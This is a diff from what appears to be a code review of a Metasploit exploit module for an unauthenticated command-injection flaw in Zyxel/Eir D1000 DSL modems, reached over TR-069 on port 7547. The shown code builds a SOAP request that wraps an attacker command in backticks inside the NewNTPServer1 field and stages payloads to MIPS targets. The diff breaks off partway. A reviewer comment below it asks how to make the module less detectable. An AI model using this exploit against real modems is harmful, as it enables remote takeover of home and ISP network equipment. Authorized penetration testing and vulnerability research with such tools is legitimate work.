modules/exploits/linux/http/tr069_ntpserver_cmdinject.rb

```diff
@@ -0,0 +1,134 @@
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Zyxel/Eir D1000 DSL Modem NewNTPServer Command Injection Over TR-069',
+      'Description' => %q{
+        Broadband DSL modems manufactured by Zyxel and distributed by some
+        European ISPs are vulnerable to a command injection vulnerability when setting
+        the 'NewNTPServer' value using the TR-069 SOAP-based configuration protocol. In
+        the tested case, no authentication is required to set this value on affected
+        DSL modems.
+
+        This exploit was originally tested on firmware versions up to 2.00(AADU.5)_20150909.
+      },
+      'Author'      =>
+        [
+          'Kenzo', # Vulnerability discovery and original Metasploit module
+          'Michael Messner <devnull[at]s3cur1ty.de>', # Copypasta from TheMoon msf module
+          'todb',  # Metasploit module
+          'wvu' ,  # Metasploit module
+          '0x27'   # Metasploit module
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          [ 'EDB', '40740' ],
+          [ 'URL', 'https://devicereversing.wordpress.com/2016/11/07/eirs-d1000-modem-is-wide-open-to-being-hacked/'],
+          [ 'URL', 'https://isc.sans.edu/forums/diary/Port+7547+SOAP+Remote+Code+Execution+Attack+Against+DSL+Modems/21759']
+        ],
+      'DisclosureDate' => 'Nov 07 2016',
+      'Privileged'     => true,
+      'Targets' =>
+        [
+          [ 'MIPS Big Endian',
+            {
+              'Platform' => 'linux',
+              'Arch'     => ARCH_MIPSBE
+            }
+          ],
+          [ 'MIPS Little Endian',
+            {
+              'Platform' => 'linux',
+              'Arch'     => ARCH_MIPSLE
+            }
+          ],
+
+        ],
+      'DefaultTarget'    => 0
+      ))
+
+    register_options(
+      [
+        Opt::RPORT(7547), # TR-069 CWMP port for SOAP/XML commands
+        OptBool::new('FORCE_EXPLOIT', [false, 'Force an attempt even if the check fails', nil])
+      ], self.class)
+
+  end
+
+  def set_new_ntp_server(cmd)
+    template = "<?xml version=\"1.0\"?>"
+    template << "<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
+    template << " <SOAP-ENV:Body>"
+    template << "  <u:SetNTPServers xmlns:u=\"urn:dslforum-org:service:Time:1\">"
+    template << "   <NewNTPServer1>`%s`</NewNTPServer1>" # Backticks, aw yeah
+    template << "   <NewNTPServer2></NewNTPServer2>"
+    template << "   <NewNTPServer3></NewNTPServer3>"
+    template << "   <NewNTPServer4></NewNTPServer4>"
+    template << "   <NewNTPServer5></NewNTPServer5>"
```

Comment:
Minor, but I wonder if all of these empty `NewNTPServerN` elements are necessary.  I also wonder if there is a requirement that the payload be delivered in `NewNTPServer1`.  Answers to these might allow this module to be a bit less detectable.